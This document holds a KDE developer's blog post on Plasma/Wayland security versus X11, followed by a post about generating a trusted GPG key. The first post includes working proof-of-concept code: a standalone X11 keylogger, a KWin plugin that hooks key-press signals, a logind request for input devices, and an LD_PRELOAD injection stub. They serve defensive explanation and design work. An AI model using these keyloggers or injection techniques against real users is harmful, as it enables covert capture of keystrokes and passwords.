Looking at the security of Plasma/Wayland

Our beta release of Plasma 5.5 includes a Wayland session file which allows starting a Plasma on Wayland session directly from a login manager that supports Wayland sessions. This is a good point in time to look at the security of our Plasma on Wayland session.

Situation on X11

X11 is not secure and has severe conceptual issues, for example:

  • any client connected to the X server (either remote or local) can read all input events
  • any client can learn when another window rendered and can grab that window’s content
  • any client can change any X attribute of any other window
  • any window can position itself
  • many more issues

This can be used to create very interesting attacks. It’s one of the reasons why I think, for example, that it’s a very bad idea to start the file manager as root on the same X server. I’m quite certain that if I wanted to I could exploit this relatively easily just through what X provides.
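To illustrate how low the bar is, here is a minimal sketch of an X11 key logger written for this post (it is one of several possible approaches and not taken from any existing tool). It needs nothing but core Xlib: it polls the global keyboard state with XQueryKeymap, which any connected client may do regardless of which window has focus.

<code>// keysnoop.cpp - build with: g++ keysnoop.cpp -o keysnoop -lX11
#include <X11/Xlib.h>
#include <cstdio>
#include <cstring>
#include <unistd.h>

int main()
{
    Display *dpy = XOpenDisplay(nullptr); // any local (or remote) client can connect
    if (!dpy) {
        return 1;
    }
    char prev[32] = {};
    while (true) {
        char keys[32];
        // global keyboard state, delivered without any focus, grab or permission
        XQueryKeymap(dpy, keys);
        for (int code = 0; code < 256; ++code) {
            const bool down = keys[code / 8] & (1 << (code % 8));
            const bool wasDown = prev[code / 8] & (1 << (code % 8));
            if (down && !wasDown) {
                std::printf("keycode pressed: %d\n", code);
            }
        }
        std::memcpy(prev, keys, sizeof(keys));
        usleep(10000); // ~100 Hz polling is more than enough to catch typing
    }
}
</code>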

The insecurity of X11 also influenced the security design of applications running on X11. It’s pointless to think about preventing potential attacks if the same result can be achieved with core X11 functionality alone. For example KWin’s scripting functionality allows interacting with the X11 windows. In general one could say that’s dangerous, as it allows untrusted code to change aspects of the managed windows, but it’s nothing you could not get with plain X11.

Improvements on Wayland

Wayland removes these threats from the X11 world. The protocols are designed in a secure way: a client cannot in any way interact with windows from other clients. This implies:

  • reading of key events for other windows is not possible
  • getting window content of other windows is not possible

In addition the protocols do not allow clients to, for example, position their windows themselves, raise themselves, or change the stacking order.

Security removed in Plasma

But lots of these security restrictions do not work for us in Plasma. Our desktop shell needs to be able to get information about other windows (e.g. for the Tasks applet), to mark a panel as a panel (kept above other windows) and to position its windows itself.

Given that, we removed some of the security aspects again and introduced a few custom protocols to provide window management facilities and also to allow Plasma windows to position themselves. At the moment there are no security restrictions on these protocols yet, which exposes this functionality to all clients.
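To give an idea of what “no restrictions yet” means in practice, the following sketch (written for this post) connects to the compositor and lists every global interface it announces. Any client gets this list, and binding one of the announced window management interfaces would be just one more call; the sketch only prints the names.

<code>// list-globals.cpp - build with: g++ list-globals.cpp -o list-globals -lwayland-client
#include <wayland-client.h>
#include <cstdio>

static void handleGlobal(void *, wl_registry *, uint32_t name,
                         const char *interface, uint32_t version)
{
    // every connected client is told about every global; if a window
    // management interface shows up here, the client could bind and use it
    std::printf("%u: %s (version %u)\n", name, interface, version);
}

static void handleGlobalRemove(void *, wl_registry *, uint32_t)
{
}

static const wl_registry_listener registryListener = {
    handleGlobal,
    handleGlobalRemove
};

int main()
{
    wl_display *display = wl_display_connect(nullptr);
    if (!display) {
        return 1;
    }
    wl_registry *registry = wl_display_get_registry(display);
    wl_registry_add_listener(registry, &registryListener, nullptr);
    wl_display_roundtrip(display); // wait until all globals have been announced
    wl_registry_destroy(registry);
    wl_display_disconnect(display);
    return 0;
}
</code>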

We will address this in a future release. There are multiple ways this could be addressed, e.g. using the Wayland security module library or using systemd in some way to restrict access. Overall I think it will require rethinking security in a Linux user session in general; more on that later on.

Security added in Plasma compared to X11

The most important change on the security front of the desktop session is a secure screen locker. With Plasma 5.5 on Wayland we are able to provide that and to address some long-standing issues from X11. The screen locks even if a context menu is open or something else is grabbing input. The compositor knows that the screen is locked and knows which window is the screen locker. This is a huge change compared to X11: the X server has no concept of a screen locker. Our compositor can now do the right thing when the screen is locked:

  • don’t render other windows
  • ensure input events are only handled in the lock screen
  • prevent access to screen grabbing functionality while screen is locked

As a matter of fact the Wayland protocol itself doesn’t know anything about screen locking either. This is something we added directly to KWin, and it doesn’t need any additional custom Wayland interfaces.
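In very simplified pseudo-C++ (this is not actual KWin code, and the class and member names are made up for illustration), the compositor-side logic boils down to two checks:

<code>// simplified illustration, not actual KWin code
void Compositor::paintScreen()
{
    for (Window *window : stackingOrder()) {
        if (m_screenLocked && window != m_lockScreenWindow) {
            continue; // while locked, no other window gets rendered
        }
        paintWindow(window);
    }
}

void InputHandler::dispatchKey(const KeyEvent &event)
{
    if (m_screenLocked) {
        sendTo(m_lockScreenWindow, event); // input only ever reaches the locker
        return;
    }
    sendTo(focusedWindow(), event);
}
</code>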

How to break the security?

Now imagine you want to write a key logger in a Plasma/Wayland world. How would you do it? I asked myself this question recently, thought about it, found a possible solution and had a key logger in less than 10 minutes: ouch.

Of course there is no way for a client to act as a key logger. The Wayland protocol is designed in a secure way and our protocol additions do not weaken that. So the key to getting a key logger is to attack KWin itself.

So what can an attacker do with KWin if he owns it? Well, pretty much anything. KWin internally has a very straightforward trust model: everything is trusted and everything can access anything. There is not much to do about that; this is simply how binaries work.

For example, as KWin is a Qt application, each loaded plugin has access to QCoreApplication::instance(). From there one could just use Qt’s meta-object introspection to, e.g., get to the InputRedirection object and connect to the internal signal emitted on each key press:

<code>void ExamplePlugin::installKeyLogger()
{
    // walk the QObject children of the application object to find KWin's
    // input handling object purely through Qt's meta-object system
    const auto children = QCoreApplication::instance()->children();
    for (auto it = children.begin(); it != children.end(); ++it) {
        const QMetaObject *meta = (*it)->metaObject();
        if (qstrcmp(meta->className(), "KWin::InputRedirection") != 0) {
            continue;
        }
        // connect to the internal signal emitted for every key press/release
        connect(*it, SIGNAL(keyStateChanged(quint32,InputRedirection::KeyboardKeyState)), this, SLOT(keyPressed(quint32)), Qt::DirectConnection);
    }
}

void ExamplePlugin::keyPressed(quint32 key)
{
    qDebug() << "!!!! Key: " << key;
}
</code>

But Martin, why don’t you just remove the signal? Why should any other aspect of KWin see the key events? Because this is just an example of the most trivial exploit. Of course it’s not the only one. With enough time and money one could write more sophisticated ones. For example, look at this scenario:

KWin uses logind to open restricted files like the input event files or the DRM node. For this KWin registers as the session controller in logind. Now a binary plugin could just send a D-Bus call to logind to also open the input event files and read all events. Or open the DRM node and take over rendering from KWin. There is nothing logind could do about it: how should it be able to distinguish a valid from an invalid request coming from KWin?
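As a rough sketch of what such a request could look like (hypothetical plugin code written for this post; whether logind actually hands out a file descriptor depends on details such as whether KWin has already taken that particular device itself), a plugin running inside KWin’s process could reuse the shared system bus connection:

<code>// hypothetical plugin code: ask logind for an input device fd from inside
// KWin's process; logind cannot distinguish this from a legitimate request
#include <QCoreApplication>
#include <QDBusConnection>
#include <QDBusInterface>
#include <QDBusMessage>
#include <QDBusObjectPath>
#include <QDBusReply>
#include <QDBusUnixFileDescriptor>
#include <unistd.h>

static int openInputDeviceThroughLogind()
{
    QDBusInterface manager(QStringLiteral("org.freedesktop.login1"),
                           QStringLiteral("/org/freedesktop/login1"),
                           QStringLiteral("org.freedesktop.login1.Manager"),
                           QDBusConnection::systemBus());
    // look up the session object of the process we are running in, i.e. KWin's session
    QDBusReply<QDBusObjectPath> session = manager.call(QStringLiteral("GetSessionByPID"),
                                                       uint(QCoreApplication::applicationPid()));
    if (!session.isValid()) {
        return -1;
    }
    QDBusInterface sessionIface(QStringLiteral("org.freedesktop.login1"),
                                session.value().path(),
                                QStringLiteral("org.freedesktop.login1.Session"),
                                QDBusConnection::systemBus());
    // /dev/input/event0 has major 13, minor 64; TakeDevice returns an open fd for it
    const QDBusMessage reply = sessionIface.call(QStringLiteral("TakeDevice"), uint(13), uint(64));
    if (reply.type() != QDBusMessage::ReplyMessage) {
        return -1;
    }
    const QDBusUnixFileDescriptor fd = reply.arguments().first().value<QDBusUnixFileDescriptor>();
    return ::dup(fd.fileDescriptor()); // duplicate, the wrapper closes its copy on destruction
}
</code>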

How to secure again?

As we can see the threat is in loading plugins. So all we need to do is ensure that KWin doesn’t load any plugins from untrusted locations (that is, not from any user-owned locations). This is easy enough for QML plugins, where we have complete control. In fact it’s easy to ensure for any of KWin’s own plugins: we can restrict the location of all of them.
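One possible shape of such a check (a sketch of the idea, not what KWin actually does; the helper names are made up) is to refuse any plugin file that is not root-owned or that can be written to by anyone but root:

<code>// sketch: only accept plugin files owned by root and not writable by group/others
#include <QFile>
#include <QPluginLoader>
#include <QString>
#include <sys/stat.h>

static bool isTrustedPluginPath(const QString &path)
{
    struct stat st;
    if (::stat(QFile::encodeName(path).constData(), &st) != 0) {
        return false; // unreadable or missing: don't load
    }
    const bool rootOwned = (st.st_uid == 0);
    const bool notWritableByOthers = !(st.st_mode & (S_IWGRP | S_IWOTH));
    return rootOwned && notWritableByOthers;
}

static QObject *loadPluginIfTrusted(const QString &path)
{
    if (!isTrustedPluginPath(path)) {
        return nullptr;
    }
    QPluginLoader loader(path);
    return loader.instance(); // loads the plugin and returns its root component, or nullptr
}
</code>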

And even more: by default a system is set up in a way that no binary plugins are loaded from the user’s home directory. So yeah, no problem after all? Well, unfortunately not. During session startup various scripts are sourced which can override the environment variables that influence the loading of plugins. And this also allows the well-known LD_PRELOAD hack. My naive approach to circumvent this issue didn’t work out at all, as I had to learn that the session startup and the PAM interaction already source scripts. So your session might be owned very early.
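For completeness, this is all the LD_PRELOAD hack needs (a generic illustration, not specific to KWin): any library listed in that variable is mapped into the target process and its constructors run before main(), at which point it has the same access as the plugin example above.

<code>// evil.cpp - build with: g++ -shared -fPIC evil.cpp -o evil.so
// run with:  LD_PRELOAD=$PWD/evil.so <any binary started from the session>
#include <cstdio>

__attribute__((constructor))
static void injected()
{
    // this runs inside the target process before its main() is entered
    std::fprintf(stderr, "injected code is running inside the host process\n");
}
</code>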

An approach of blacklisting (unsetting) env variables is futile. There are too many libraries KWin relies on which in turn load plugins through custom env variables. The most obvious examples are Qt and Mesa, but there are probably many more. If we forget to unset one variable the protection is broken.
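A blacklist would look roughly like the sketch below (the variable names are real, the helper is made up); the comment at the end is the whole problem: the list can never be known to be complete.

<code>#include <cstdlib>

// unset the plugin-loading variables we happen to know about
static void unsetKnownPluginVariables()
{
    const char *vars[] = {
        "LD_PRELOAD", "LD_LIBRARY_PATH",                  // dynamic linker
        "QT_PLUGIN_PATH", "QT_QPA_PLATFORM_PLUGIN_PATH",  // Qt
        "LIBGL_DRIVERS_PATH",                             // Mesa
        // ...and whichever variables we forgot or don't know about
    };
    for (const char *var : vars) {
        ::unsetenv(var);
    }
}
</code>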

A different approach would be to whitelist some known secure env variables and pass only those to KWin. But this requires that at the point where we want to apply the restriction the session is not already completely broken. This in turn means that neither PAM nor the session manager may load any variables into the session before the session startup begins. And that’s unfortunately outside what we can do in our session startup.

So for Plasma 5.5 I think there is nothing we can do to get this secure, which is fine given that the Wayland session is still under development. For Plasma 5.6 we need to rethink the approach completely, and that might involve changing the startup overall. We need a secure and controlled startup process. Only once KWin is started can we think about sourcing env variables from user locations.

So how big is the threat? By default it’s of course secure. Only if there is already a malicious program running on the system is there a chance of installing a key logger in this way. If someone is able to exploit e.g. a browser in a way that lets it store an env variable script in one of the sourced locations, you are owned. Or if someone is able to get physical access to your unencrypted hard disk, there is a threat. There are easy workarounds for a user: make all locations from which scripts are sourced during session startup non-writable and non-executable (ideally change their ownership to root) and encrypt your home directory.

Overall it means that Plasma 5.5 on Wayland is not yet able to provide the security I would have liked to have, but it’s still a huge improvement over X11. And I’m quite certain that we will be able to solve this.

Generating a private key I can trust

Given last week’s news about the state of cryptography and the influence of the NSA on standards I decided to enter paranoid/tinfoil-hat mode. The result is that I no longer consider my asymmetric keys long enough, so I need to regenerate them. This should be an easy task, but I’m in paranoid mode.

The big problem is: “can I trust my systems to generate a safe key?” I decided no, I cannot. Not without investing some time. Normally I would trust my distribution, but I once had to regenerate my SSH key because they got random numbers wrong:
[Image: “Random Number” by Randall Munroe (Creative Commons Attribution-NonCommercial 2.5 License)]

So whom do I actually trust? This list is short: the Linux kernel (Linus tree) and FSF/GNU.

Whom do I not trust? That gets more complicated. First of all I do not trust any hardware. It’s impossible to verify that the hardware doesn’t have a backdoor, and randomness looks random even if it has been tampered with.

Of course I do not trust the US, any US-based company, or any company which has interactions with the US. As we had to learn, the NSA is putting backdoors into products of US companies and the companies are not allowed to talk about it. This means I do not trust the Linux kernel of any distribution based in the US or with relations to the US. Obviously I extend this to all distributions of companies based in other spying countries (e.g. Five Eyes). This makes the list rather short.

I also do not trust binaries, as there is no way to ensure that the binary reflects the source code of the package[1]. This further reduces the list. I’m basically left with Linux From Scratch or Gentoo – two distributions I do not have any experience with. Or I use a binary distribution and build the required packages myself (Linux kernel, GPG). Obviously there is still the risk of a tampered compiler, but I consider this risk rather academic.

Last but not least I do not trust my systems and myself. If I keep the key on the hard disk, the security is basically reduced to the strength of the chosen passphrase. Hard disk encryption can add some security, but I prefer to have my system in suspend, so the key might be in memory and there is always the risk of cold boot attacks. In summary I do not think that hard disk encryption is a solution for protecting the key. Also there is always the risk of an application attacking the system: getting the passphrase through an X11 key logger is unfortunately trivial.

A solution to this problem is to keep the key on an external dedicated device. But this of course conflicts with my “I do not trust hardware” requirement. If hardware random number generators are involved in creating the keys or doing the encryption, this would be problematic.

The requirement would therefore be a hardware device which keeps the key secure but does not generate it and is not involved in the session encryption. Today I ordered an OpenPGP smartcard. This fulfills most of my requirements: it’s trusted by the FSFE (Fellowship card) and developed by a company which also develops GnuPG and is based in Germany. I still do not trust the hardware, but one can upload an externally created key.

So sometime soon I will blog the public key of my new key pair.

[1] I am aware that Bitcoin is experimenting in that direction. But this doesn’t help me with the problem of verifying the Linux kernel.